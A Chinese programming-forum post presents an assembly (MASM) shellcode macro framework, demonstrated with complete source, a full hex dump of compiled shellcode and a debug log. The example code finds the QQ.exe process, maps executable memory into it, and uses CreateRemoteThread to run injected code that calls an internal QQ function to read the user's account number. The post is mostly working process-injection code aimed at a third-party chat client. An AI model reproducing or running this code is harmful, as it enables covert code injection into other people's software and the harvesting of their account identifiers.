| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1360 人关注过本帖
标题:MAsM ShellCode 宏框架
只看楼主 加入收藏
yibana
Rank: 2
等 级:论坛游民
帖 子:10
专家分:20
注 册:2013-1-6
结帖率:100%
收藏
 问题点数:0 回复次数:10 
MAsM ShellCode 宏框架
下面通过远程注入代码获取QQ号的例子来演示使用方法

代码预览:

代码:
程序代码:
.386
.model flat, stdcall
option casemap :none

include windows.inc
includelib user32.lib
include myMacro.asm
injectCode proto
.CODE
DeBug = 1 ;调试模式,会增大体积,发行时请注释掉
; SHELLCODE 新构架 设置导入表,注意,这里都不用双引号
Import  MyIAT,    Kernel32,GetModuleHandleA,GetProcAddress,Process32First,CreateToolhelp32Snapshot,lstrcmpiA,Process32Next,CloseHandle,\
    CreateRemoteThread,OpenProcess,LoadLibraryA,WaitForSingleObject,GetExitCodeThread,CreateFileMappingA,GetCurrentProcessId
Import  MyIAT,    Kernel32,RtlMoveMemory,OutputDebugStringA
Import  MyIAT,    ntdll,NtMapViewOfSection
Import  MyIAT,    user32,wsprintfA

Import  injectIAT,  Kernel32,GetModuleHandleA,GetProcAddress

jmp  START
injectCode proc
%echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT))
local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD 
LdrImport injectIAT,APIArrayBuff  ;载入所有导入表中的APi
ImportApiCall GetModuleHandleA,"KernelUtil.dll"
.if eax
  ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ"
  .if  eax
    call  eax ; get qq num  return eax
    ret
  .endif
.endif
xor  eax,eax
injectCode endp
injectCodeEnd:
injectCodelen = injectCodeEnd-injectCode
START proc 
local APIArrayBuff[__GetBuffSize__(MyIAT)]:DWORD   ;设置一个API缓冲区,可以使用常量__APiNumber__
LOCAL  info:PROCESSENTRY32
LOCAL  handle:HANDLE
LOCAL   hProcess1:HANDLE,hProcess2:HANDLE
local   hMappedFile:HANDLE,ViewBase1:DWORD,ViewBase2:DWORD,ViewSize:DWORD,radr:dword
LOCAL hRemoteThread:dword,Return_Value:dword
local @QQUid[16]:BYTE 
%echo MyIAT,__GetBuffSize__,num2str(__GetBuffSize__(MyIAT))
pushad
LdrImport MyIAT,APIArrayBuff  ;载入所有导入表中的API
mov  ViewSize,1024*4
ImportApiCall CreateFileMappingA, INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE , 0, 1024*4, NULL
mov  hMappedFile,eax
ImportApiCall GetCurrentProcessId
ImportApiCall OpenProcess, PROCESS_ALL_ACCESS,FALSE,eax
mov  hProcess2,eax
and  ViewBase2,0 ;在win7不清空会出错
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0
  BaseRelocations eax
  lea  eax,[offset injectCode + eax] ;别忘了重定位
  mov  radr,eax
  ImportApiCall RtlMoveMemory,ViewBase2,radr,injectCodelen
  ImportApiCall CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ;进程快照
  mov    handle,eax
  mov    info.dwSize,sizeof PROCESSENTRY32
  ImportApiCall Process32First,handle,addr info
  .repeat
    ImportApiCall lstrcmpiA,addr info.szExeFile,"QQ.exe" ;比较是否为我们要找的进程名,不区分大小写
    .if !eax
    ImportApiCall OpenProcess,4095, 0,info.th32ProcessID
       .if eax
       mov  hProcess1,eax
       and  ViewBase1,0
       mov  ViewSize,1024*4
       ImportApiCall NtMapViewOfSection,hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
  
         .if eax>=0
         ImportApiCall CreateRemoteThread,hProcess1,0,0,ViewBase1,0,0,0
           .if eax
             mov  hRemoteThread,eax
             ImportApiCall WaitForSingleObject,hRemoteThread, INFINITE
             ImportApiCall GetExitCodeThread,hRemoteThread, addr Return_Value
             push  esi
             mov  esi,esp
             ImportApiCall wsprintfA,addr @QQUid,"获取到QQ号:%d",Return_Value
             ImportApiCall OutputDebugStringA,addr @QQUid
             mov  esp,esi
             pop  esi
             ImportApiCall CloseHandle,hRemoteThread
           .endif
         .endif
        ImportApiCall CloseHandle,hProcess1
       .endif  
    
    .endif
    ImportApiCall Process32Next,handle,addr info
  .until !eax
  ImportApiCall CloseHandle,handle
.endif
  ImportApiCall CloseHandle,hProcess2
  

popad
ret
START endp  
end START

下面是调试输出模式的shellcode:
代码:
E9 E2 02 00 00 55 8B EC 83 C4 F8 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04
8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44
10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B
3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4
08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C
6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C
65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75 74 44 65 62 75 67
53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00 00 44 65 62 75 67
20 6D 6F 64 65 21 00 FF 54 24 14 E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00
47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00
5F B9 01 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68 8B D8
56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24 08 89
44 8D F8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66 61 69
6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01 59 49
0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61 6D 65
3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C 24 08
B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 60 E8 30 00 00 00 69 6E 6A 65 63 74 49 41
54 3A 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 09 09 09 28 22 4B 65 72 6E 65 6C 55 74 69
6C 2E 64 6C 6C 22 29 00 FF 55 00 61 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00
FF 55 F8 0B C0 74 7E 60 E8 43 00 00 00 69 6E 6A 65 63 74 49 41 54 3A 47 65 74 50 72 6F 63 41 64
64 72 65 73 73 09 09 09 28 65 61 78 2C 22 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63
74 40 55 74 69 6C 40 40 59 41 4B 58 5A 22 29 00 FF 55 00 61 E8 20 00 00 00 3F 47 65 74 53 65 6C
66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74
04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40
D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B
D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65
73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48
18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04
E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65
74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75
74 44 65 62 75 67 53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00
00 44 65 62 75 67 20 6D 6F 64 65 21 00 FF 54 24 14 E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E
4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47
65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50
72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E
61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43
6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70
65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69
6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65
61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73
73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72
69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66
41 00 5F B9 04 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68
8B D8 56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24
08 89 44 8D B8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66
61 69 6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01
59 49 0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61
6D 65 3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C
24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 60 E8
5C 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 09 09 09 28
49 4E 56 41 4C 49 44 5F 48 41 4E 44 4C 45 5F 56 41 4C 55 45 2C 4E 55 4C 4C 2C 50 41 47 45 5F 45
58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 2C 30 2C 31 30 32 34 2A 34 2C 4E 55 4C 4C 29 00
FF 55 00 61 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF 60 E8 1F 00
00 00 4D 79 49 41 54 3A 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 09 09 09 28 29
00 FF 55 00 61 FF 55 EC 60 E8 33 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63 65 73 73 09
09 09 28 50 52 4F 43 45 53 53 5F 41 4C 4C 5F 41 43 43 45 53 53 2C 46 41 4C 53 45 2C 65 61 78 29
00 FF 55 00 61 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 60 E8 71
00 00 00 4D 79 49 41 54 3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68
4D 61 70 70 65 64 46 69 6C 65 2C 68 50 72 6F 63 65 73 73 32 2C 61 64 64 72 20 56 69 65 77 42 61
73 65 32 2C 30 2C 30 2C 30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45
5F 45 58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85
74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55
F8 83 F8 00 0F 82 16 05 00 00 E8 00 00 00 00 81 2C 24 CF 17 40 00 58 8D 80 05 10 40 00 89 85 70
FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 09 09 09 28
56 69 65 77 42 61 73 65 32 2C 72 61 64 72 2C 69 6E 6A 65 63 74 43 6F 64 65 6C 65 6E 29 00 FF 55
00 61 68 E2 02 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 60 E8 38 00 00 00 4D 79 49 41
54 3A 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 09 09 09 28 54 48
33 32 43 53 5F 53 4E 41 50 50 52 4F 43 45 53 53 2C 30 29 00 FF 55 00 61 6A 00 6A 02 FF 55 C4 89
85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 60 E8 2A 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65
73 73 33 32 46 69 72 73 74 09 09 09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF
55 00 61 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 60 E8 31 00 00 00 4D 79 49 41 54 3A 6C
73 74 72 63 6D 70 69 41 09 09 09 28 61 64 64 72 20 69 6E 66 6F 2E 73 7A 45 78 65 46 69 6C 65 2C
22 51 51 2E 65 78 65 22 29 00 FF 55 00 61 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF
50 FF 55 C8 0B C0 0F 85 39 03 00 00 60 E8 30 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63
65 73 73 09 09 09 28 34 30 39 35 2C 30 2C 69 6E 66 6F 2E 74 68 33 32 50 72 6F 63 65 73 73 49 44
29 00 FF 55 00 61 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 E7 02 00 00 89 85
88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 60 E8 71 00 00 00 4D 79 49 41 54
3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68 4D 61 70 70 65 64 46 69
6C 65 2C 68 50 72 6F 63 65 73 73 31 2C 61 64 64 72 20 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45 5F 45 58 45 43 55 54 45
5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A
00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 F0 01
00 00 60 E8 3B 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64
09 09 09 28 68 50 72 6F 63 65 73 73 31 2C 30 2C 30 2C 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 29 00 FF 55 00 61 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4
0B C0 0F 84 8A 01 00 00 89 85 6C FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 57 61 69 74 46 6F
72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72 65 61 64 2C 49
4E 46 49 4E 49 54 45 29 00 FF 55 00 61 6A FF FF B5 6C FE FF FF FF 55 E0 60 E8 3C 00 00 00 4D 79
49 41 54 3A 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 09 09 09 28 68 52 65 6D 6F 74 65
54 68 72 65 61 64 2C 61 64 64 72 20 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 8D 85
68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 60 E8 3D 00 00 00 4D 79 49 41 54 3A 77 73 70
72 69 6E 74 66 41 09 09 09 28 61 64 64 72 20 40 51 51 55 69 64 2C 22 BB F1 C8 A1 B5 BD 51 51 BA
C5 3A 25 64 22 2C 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 FF B5 68 FE FF FF E8 0E
00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 60 E8 29 00 00
00 4D 79 49 41 54 3A 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 09 09 09 28 61 64 64
72 20 40 51 51 55 69 64 29 00 FF 55 00 61 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E 60 E8 24 00 00
00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72
65 61 64 29 00 FF 55 00 61 FF B5 6C FE FF FF FF 55 D0 60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C
6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63 65 73 73 31 29 00 FF 55 00 61 FF B5 88 FE
FF FF FF 55 D0 60 E8 29 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65 73 73 33 32 4E 65 78 74 09 09
09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF 55 00 61 8D 85 90 FE FF FF 50 FF
B5 8C FE FF FF FF 55 CC 0B C0 0F 85 23 FC FF FF 60 E8 1D 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73
65 48 61 6E 64 6C 65 09 09 09 28 68 61 6E 64 6C 65 29 00 FF 55 00 61 FF B5 8C FE FF FF FF 55 D0
60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63
65 73 73 32 29 00 FF 55 00 61 FF B5 84 FE FF FF FF 55 D0 61 C9 C3

调试输出信息,请用debugview查看:

00000004  10.53667545  [5112] Debug mode!  
00000005  10.53904152  [5112] MyIAT:CreateFileMappingA   (INVALID_HANDLE_VALUE,NULL,PAGE_EXECUTE_READWRITE,0,1024*4,NULL)  
00000006  10.53908825  [5112] MyIAT:GetCurrentProcessId   ()  
00000007  10.53913784  [5112] MyIAT:OpenProcess   (PROCESS_ALL_ACCESS,FALSE,eax)  
00000008  10.53917313  [5112] MyIAT:NtMapViewOfSection   (hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)  
00000009  10.53923798  [5112] MyIAT:RtlMoveMemory   (ViewBase2,radr,injectCodelen)  
00000010  10.53926563  [5112] MyIAT:CreateToolhelp32Snapshot   (TH32CS_SNAPPROCESS,0)  
00000011  10.54169750  [5112] MyIAT:Process32First   (handle,addr info)  
00000012  10.54172421  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000013  10.54194260  [5112] MyIAT:Process32Next   (handle,addr info)  
00000014  10.54199123  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000015  10.54202461  [5112] MyIAT:Process32Next   (handle,addr info)  
00000016  10.54206276  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000017  10.54209423  [5112] MyIAT:Process32Next   (handle,addr info)  
00000018  10.54213047  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000019  10.54216290  [5112] MyIAT:Process32Next   (handle,addr info)  
00000020  10.54220104  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000021  10.54223156  [5112] MyIAT:Process32Next   (handle,addr info)  
00000022  10.54226780  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000023  10.54229736  [5112] MyIAT:Process32Next   (handle,addr info)  
00000024  10.54233360  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000025  10.54236412  [5112] MyIAT:Process32Next   (handle,addr info)  
00000026  10.54240036  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000027  10.54243088  [5112] MyIAT:Process32Next   (handle,addr info)  
00000028  10.54246712  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000029  10.54249859  [5112] MyIAT:Process32Next   (handle,addr info)  
00000030  10.54253387  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000031  10.54256439  [5112] MyIAT:Process32Next   (handle,addr info)  
00000032  10.54260063  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000033  10.54263020  [5112] MyIAT:Process32Next   (handle,addr info)  
00000034  10.54266548  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000035  10.54269600  [5112] MyIAT:Process32Next   (handle,addr info)  
00000036  10.54273129  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000037  10.54276276  [5112] MyIAT:Process32Next   (handle,addr info)  
00000038  10.54279709  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000039  10.54282856  [5112] MyIAT:Process32Next   (handle,addr info)  
00000040  10.54286480  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000041  10.54293251  [5112] MyIAT:Process32Next   (handle,addr info)  
00000042  10.54296970  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000043  10.54300022  [5112] MyIAT:Process32Next   (handle,addr info)  
00000044  10.54304123  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000045  10.54307461  [5112] MyIAT:Process32Next   (handle,addr info)  
00000046  10.54310989  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000047  10.54313946  [5112] MyIAT:Process32Next   (handle,addr info)  
00000048  10.54317570  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000049  10.54320717  [5112] MyIAT:Process32Next   (handle,addr info)  
00000050  10.54324436  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000051  10.54327393  [5112] MyIAT:Process32Next   (handle,addr info)  
00000052  10.54330921  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000053  10.54333973  [5112] MyIAT:Process32Next   (handle,addr info)  
00000054  10.54337502  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000055  10.54340553  [5112] MyIAT:Process32Next   (handle,addr info)  
00000056  10.54344177  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000057  10.54347229  [5112] MyIAT:Process32Next   (handle,addr info)  
00000058  10.54350662  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000059  10.54353809  [5112] MyIAT:Process32Next   (handle,addr info)  
00000060  10.54357433  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000061  10.54360485  [5112] MyIAT:Process32Next   (handle,addr info)  
00000062  10.54364014  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000063  10.54367065  [5112] MyIAT:Process32Next   (handle,addr info)  
00000064  10.54370689  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000065  10.54373550  [5112] MyIAT:Process32Next   (handle,addr info)  
00000066  10.54377079  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000067  10.54380226  [5112] MyIAT:Process32Next   (handle,addr info)  
00000068  10.54383755  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000069  10.54386806  [5112] MyIAT:Process32Next   (handle,addr info)  
00000070  10.54390335  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000071  10.54393291  [5112] MyIAT:Process32Next   (handle,addr info)  
00000072  10.54396820  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000073  10.54399872  [5112] MyIAT:Process32Next   (handle,addr info)  
00000074  10.54427528  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000075  10.54431629  [5112] MyIAT:Process32Next   (handle,addr info)  
00000076  10.54435539  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000077  10.54438496  [5112] MyIAT:Process32Next   (handle,addr info)  
00000078  10.54442024  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000079  10.54445171  [5112] MyIAT:Process32Next   (handle,addr info)  
00000080  10.54448795  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000081  10.54451752  [5112] MyIAT:Process32Next   (handle,addr info)  
00000082  10.54455280  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000083  10.54458332  [5112] MyIAT:Process32Next   (handle,addr info)  
00000084  10.54461861  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000085  10.54464912  [5112] MyIAT:Process32Next   (handle,addr info)  
00000086  10.54468441  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000087  10.54471493  [5112] MyIAT:Process32Next   (handle,addr info)  
00000088  10.54475021  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000089  10.54477978  [5112] MyIAT:Process32Next   (handle,addr info)  
00000090  10.54481506  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000091  10.54484558  [5112] MyIAT:Process32Next   (handle,addr info)  
00000092  10.54488277  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000093  10.54491138  [5112] MyIAT:Process32Next   (handle,addr info)  
00000094  10.54494762  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000095  10.54497719  [5112] MyIAT:Process32Next   (handle,addr info)  
00000096  10.54501247  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000097  10.54504395  [5112] MyIAT:Process32Next   (handle,addr info)  
00000098  10.54507923  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000099  10.54510880  [5112] MyIAT:Process32Next   (handle,addr info)  
00000100  10.54514408  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000101  10.54517365  [5112] MyIAT:Process32Next   (handle,addr info)  
00000102  10.54521084  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000103  10.54524136  [5112] MyIAT:Process32Next   (handle,addr info)  
00000104  10.54527664  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000105  10.54530716  [5112] MyIAT:Process32Next   (handle,addr info)  
00000106  10.54534245  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000107  10.54537201  [5112] MyIAT:Process32Next   (handle,addr info)  
00000108  10.54540825  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000109  10.54543972  [5112] MyIAT:Process32Next   (handle,addr info)  
00000110  10.54547501  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000111  10.54550457  [5112] MyIAT:Process32Next   (handle,addr info)  
00000112  10.54554081  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000113  10.54557037  [5112] MyIAT:Process32Next   (handle,addr info)  
00000114  10.54560471  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000115  10.54563618  [5112] MyIAT:Process32Next   (handle,addr info)  
00000116  10.54567146  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000117  10.54570198  [5112] MyIAT:Process32Next   (handle,addr info)  
00000118  10.54573727  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
